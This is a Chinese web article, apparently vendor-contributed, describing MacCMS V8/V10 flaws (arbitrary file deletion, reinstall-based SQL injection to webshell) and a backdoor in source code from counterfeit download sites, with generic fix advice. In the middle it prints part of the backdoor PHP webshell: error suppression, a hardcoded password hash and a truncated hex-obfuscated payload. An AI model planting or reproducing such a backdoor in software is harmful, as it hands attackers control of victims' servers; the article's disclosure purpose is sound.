<bdo id="vljxk"><rt id="vljxk"><noframes id="vljxk"><noframes id="vljxk"><noframes id="vljxk"><rt id="vljxk"></rt><rt id="vljxk"></rt><noframes id="vljxk"><rt id="vljxk"><delect id="vljxk"></delect></rt><noframes id="vljxk"><rt id="vljxk"></rt><noframes id="vljxk"><noframes id="vljxk"><rt id="vljxk"></rt>

當前位置:首頁 >  站長 >  建站經驗 >  正文

蘋果CMS漏洞修復 對SQL遠程代碼注入及任意文件刪除修補辦法

 2020-01-07 11:33  來源: A5用戶投稿   我來投稿 撤稿糾錯

  阿里云優惠券 先領券再下單

目前蘋果CMS官方在不斷的升級補丁,官方最新的漏洞補丁對于目前爆發的新漏洞沒有任何效果。更新補丁的用戶網站還是會遭受到掛馬的攻擊,很多客戶因此找到我們SINE安全尋求網站安全技術上的支持,針對該漏洞我們有著獨特的安全解決方案以及防止掛馬攻擊的防護,包括一些未公開的maccms POC漏洞都有修復補丁。

目前maccms官方被百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 蘋果官方網站因為特殊原因已經停止訪問,該內容被禁止訪問,但是升級補丁更新的網址還是可以打開的。

截圖如下:

蘋果CMS漏洞詳情:

蘋果CMS V8 V10版本存在代碼重裝漏洞,以及代碼后門漏洞,任意文件刪除漏洞,通過CNVD-2019-43865的信息安全漏洞通報,可以確認maccms V10存在漏洞,可以偽造惡意代碼發送到網站后端進行執行,可以刪除網站目錄下的任意文件,可刪除重裝蘋果CMS系統的配置文件,導致可以重新安裝maccms系統,并在安裝過程中插入sql注入代碼到數據庫中去執行并獲取webshell以及服務器權限。

蘋果CMS V8 V10 源代碼存在后門漏洞,經過我們SINE安全技術的檢測發現,存在后門的原因是,目前百度搜索蘋果官網,maccms官方,排在百度搜索首頁的都是仿冒的網站,真正官網地址是www.maccms.com,包括模板,圖片,以及CSS跟真正的官方是一模一樣,很多客戶都是點擊到這個山寨網站上去進行下載的源代碼,該代碼里隱藏了木馬后門文件,阿里云都無法檢測出來,

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..

define('Viv, bebegim.','Denzel-你的英雄'); // 標題

function s(){

$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s

7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323

代碼如上面所示,是加密過的,經過我們SINE安全的解密發現是PHP的腳本木馬,可以繞過各大服務器廠商的安全檢測,包括阿里云,騰訊云,百度云,華為云。

關于蘋果CMS網站漏洞的修復方案與辦法

對任意文件刪除漏洞做安全過濾與檢查,防止del刪除的語句的執行,對前端傳輸過來的參數進行嚴格的檢測,不管是get,post,cookies,如果您對代碼不是太懂的話也可以找專業的網站安全公司來處理解決蘋果CMS網站被攻擊的問題,或者是對重裝文件進行改名以及安裝配置文件進行權限設置,只讀權限,對于存在網站木馬后門的蘋果cms系統,人工對代碼進行安全審計,對所有網站目錄下每個代碼文件都要仔細的排查,可以下載官方的源代碼進行比對。

申請創業報道,分享創業好點子。點擊此處,共同探討創業新機遇!

相關文章

  • 推薦幾款市面上常用的免費CMS建站系統

    小編在網站建設行業從業十幾年,很多客戶或者朋友找我做網站的時候,都喜歡開發一個完全熟悉自己的網站系統,但是小編這里很不推薦。從0到1全新開發,成本,效率和成熟度這些和主流的cms建站系統比起來,完全沒有優勢,所以大部分建站公司都會選擇采用市面上主流的建站系統,今天小編給大家介紹五款我自己用過的還不錯

    標簽:
    cms系統
  • 敏感信息數據泄露漏洞該怎么查

    數據泄露一旦發生,會對公司的造成極大的影響。如果處理妥當,危機還能夠被化解。當公司遭到數據泄露時,至關重要的是在短期內快速的應急響應并處理,全面的前期準備是處理數據泄露事件的核心

  • 網站繞過漏洞如何修復與檢測

    本月帶給大家的是網站繞過認證漏洞。為了更好地確保業務管理系統的安全防護,基本上每一系統軟件都是會存有各式各樣的認證功能。普遍的幾類認證功能就包含賬戶密碼認證、驗證碼短信認證

  • 藍科lankecms網站源碼漏洞導致被批量篡改首頁文件

    近期受到很多用藍科lankecms網站源碼做的網站的客戶反饋首頁文件index.html和m.html被篡改增加了跳轉代碼,導致從百度點擊進來的直接跳轉到世界杯體育網站上去,而且百度快照收錄的標題也被篡改了

  • 網站做漏洞滲透測試服務的重要性

    現實生活中小企業面對的網絡安全風險多種多樣。而真正的隱患,是公司覺得自己自身非常安全,卻不知道隱患早就滲透到里面,見機行事。隨著安全產業的發展和技術人員安全防范意識的提升

熱門排行

信息推薦